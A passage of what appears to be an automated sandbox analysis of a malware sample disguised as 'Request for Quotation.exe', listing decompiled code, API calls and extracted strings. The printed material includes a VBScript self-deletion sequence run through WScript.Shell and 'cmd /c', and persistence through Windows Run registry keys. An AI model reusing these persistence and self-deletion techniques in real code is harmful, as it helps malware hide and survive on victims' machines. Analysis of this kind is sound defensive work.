                                                                                					return _t4;
                                                                                				} else {
                                                                                					_t7 = 0x10;
                                                                                					if(_t4 != _t7) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
                                                                                						return _t4;
                                                                                					}
                                                                                				}
                                                                                			}









                                                                                APIs
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: KeyboardLayout
                                                                                • String ID:
                                                                                • API String ID: 194098044-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t7;
                                                                                				intOrPtr* _t10;
                                                                                
                                                                                				_t10 = _a4;
                                                                                				_t6 = _a8;
                                                                                				asm("cpuid");
                                                                                				 *_t10 = _t6;
                                                                                				 *((intOrPtr*)(_t10 + 4)) = _t7;
                                                                                				 *((intOrPtr*)(_t10 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
                                                                                				return _t6;
                                                                                			}







                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 00407E46
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                • wcscmp.MSVCRT ref: 00407EE0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Request for Quotation.exe,00000000), ref: 00407F25
                                                                                • wcslen.MSVCRT ref: 00407F40
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Request for Quotation.exe,00000000), ref: 00407FC6
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407FD3
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                                                                • wcslen.MSVCRT ref: 00408022
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                                                                • _wgetenv.MSVCRT ref: 0040804B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe,?,00415628,0041623C), ref: 004080B0
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                                                                • exit.MSVCRT ref: 00408228
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                                                                • String ID: """, 0$6$C:\Users\user\Desktop\Request for Quotation.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                • API String ID: 740851534-1532156180
                                                                                • Opcode ID: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                                                                • Opcode Fuzzy Hash: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 00407E46
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                                                                • wcscmp.MSVCRT ref: 00407EE0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                                                                • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407F25
                                                                                • wcslen.MSVCRT ref: 00407F40
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                                                                • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407FC6
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(0041BA5C), ref: 00407FD3
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                                                                • wcslen.MSVCRT ref: 00408022
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                                                                • _wgetenv.MSVCRT ref: 0040804B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?,00415628,0041623C), ref: 004080B0
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                                                                • exit.MSVCRT ref: 00408228
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                                                                • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                • API String ID: 740851534-1662879639
                                                                                • Opcode ID: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                                                                • Opcode Fuzzy Hash: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E004085AC(char _a4) {
                                                                                				signed int _v5;
                                                                                				char _v6;
                                                                                				char _v24;
                                                                                				char _v40;
                                                                                				char _v56;
                                                                                				char _v72;
                                                                                				char _v88;
                                                                                				void* _v104;
                                                                                				void* _v120;
                                                                                				short _v640;
                                                                                				void* _t63;
                                                                                				char* _t65;
                                                                                				WCHAR* _t68;
                                                                                				char* _t69;
                                                                                				char* _t71;
                                                                                				char* _t74;
                                                                                				char* _t75;
                                                                                				char* _t76;
                                                                                				char* _t77;
                                                                                				signed int* _t79;
                                                                                				char* _t80;
                                                                                				char* _t81;
                                                                                				signed int _t82;
                                                                                				short* _t84;
                                                                                				char* _t85;
                                                                                				char* _t86;
                                                                                				WCHAR* _t88;
                                                                                				char* _t89;
                                                                                				char* _t90;
                                                                                				short* _t154;
                                                                                				void* _t161;
                                                                                				void* _t162;
                                                                                				void* _t164;
                                                                                				void* _t166;
                                                                                
                                                                                				_t63 = E0040AC8C();
                                                                                				if( *0x41b154 != 0x30) {
                                                                                					_t63 = E00406D41(0x41b900);
                                                                                				}
                                                                                				if( *0x41c118 == 1) {
                                                                                					_t63 = E0041050F(_t63);
                                                                                				}
                                                                                				if( *0x41b22a != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t63 = E00412BEE(_t63);
                                                                                				}
                                                                                				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                                                                				if( *0x41ba58 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
                                                                                					_t161 = _t161 + 0xc;
                                                                                				}
                                                                                				if( *0x41bc64 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t63 = E0040B9E8(0x80000002, _t94, _t63);
                                                                                					_t161 = _t161 + 0xc;
                                                                                				}
                                                                                				if( *0x41ba20 == 1) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
                                                                                					_t161 = _t161 + 0xc;
                                                                                				}
                                                                                				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
                                                                                				_t162 = _t161 + 0x1c;
                                                                                				if(_t65 == 0) {
                                                                                					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
                                                                                				}
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
